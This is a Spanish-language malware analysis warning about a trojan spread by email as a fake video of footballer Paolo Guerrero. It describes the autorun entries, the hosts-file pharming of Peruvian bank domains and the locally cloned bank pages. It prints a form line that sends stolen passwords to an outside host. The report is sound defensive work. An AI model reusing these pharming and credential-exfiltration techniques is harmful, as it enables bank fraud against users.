CUIDADO: Malware que Confirma Supuesta

Homosexualidad de Paolo Guerrero

1. El archivo malicioso es enviado a través de correo electrónico y usa una

variante del troyano Dropper para esconder un archivo ejecutable.

2. Es un correo falso que usa una imagen de la pagina de la conductora

Magaly TV y unas supuestas imágenes del futbolista con escenas
sexuales, a esta enlazada a una dirección Web

La dirección Web conteniendo el virus es la siguiente:

hxxp://www.vanitininfo.com/videos/magaly/video.php

3. Si el usuario hace clic sobre la imagen obtendrá una ventana de dialogo

que le indica que puedes descargar o ejecutar un archivo con el nombre
Paolo_Guerrero.mp4.exe
4. Con fines de análisis decidimos primero descargar el archivo, y luego
ejecutar

Windows XP y similares tiene por defecto habilitado la

opción de las carpetas: Ocultar extensiones de archivo.

En caso la opción se encuentre deshabilitada, cosa que hemos hecho

intencionalmente para ver que este malware no es un video como
aparenta si no un archivo ejecutable. Paolo_Guerrero.mp4.exe

5. Al ejecutar, por obvias razones (nos es video) nunca llegará a verse el

supuesto video, en cambio el malware hace su trabajo infectando la
computadora.

6. Terminada la ejecución aparece una ventana indicando un error en la

ejecución de Windows Media Player

7. Seguidamente analizamos la utilidad de configuración de sistema de

Windows, mas conocida como Msconfig.
 Veremos que el Malware ha creado algunas entradas modificando el
Registro de Windows para que se auto ejecuten los archivos maliciosos.

C:\Windows\system\www\help.exe
C:\Windows\system\www\bcp\rome.exe
C:\Windows\system\www\help.exe
C:\Windows\system32\208090\F08219.EXE

8. Analizamos el archivo host (C:\Windows\system32\drivers\etc)

Veremos que se han creado algunas entradas que nos dan pistas de lo
que hace este troyano.

127.0.0.1 scotiabank.com.pe
127.0.0.1 www.scotiabank.com.pe
127.0.0.1 peb1.bbvanetlatam.com
127.0.0.1 www.viabcp.com
127.0.0.1 viabcp.com

Con esto podemos asegurar preliminarmente que este malware esta

usando la técnica del farming para modificar los host de la maquina
victima a fin de redireccionar el acceso a las paginas Web de los bancos
de Crédito, Scotiabank, BBVA.

9. Buscamos la carpeta C:\Windows\system\www\

Veremos que el malware ha creado unas carpetas conteniendo un clon

de las páginas Web de los bancos citados, incluso ha creado un
 pequeño servidor Web para que la victima pueda navegar sin problemas
una vez que es diseccionado a la pagina falsa alojada localmente en el
equipo.

10. Queda evidente que lo que hace este malware es robar

sistemáticamente las contraseñas de las tarjetas de credito de los
usuarios infectados mediante la técnica del Phishing.

11. Las contraseñas son recogidas localmente mediante las páginas Web
clonadas y son enviadas mediante los scripts de java.

Por ejemplo se pueden ver scripts que contienen lo siguiente:

<form action=http://www.mimundo.com.ar/process.php method=”post” name=”entrada”>

Una cosa que me llamo la atencion en un script es quien elaboró el script

ni siquiera se tomo la molestia de editar y eliminar sus datos de los
comentarios.

/**
*Version $Revision: 1.29.2.2 $
*Last modified: $Date:2008/06/25 19:57:34 $ (UTC) by $Autor: csilva $

*/
12. Se pueden ver incluso que el clon de la página Web de Scotiabank se
atreve a pedir la 2da clave desde el modulo de ingreso a operaciones en
línea, cosa que ningún banco hace.

13. Seguiremos analizando este malware y presentaremos mas novedades

en un segundo informe ………………….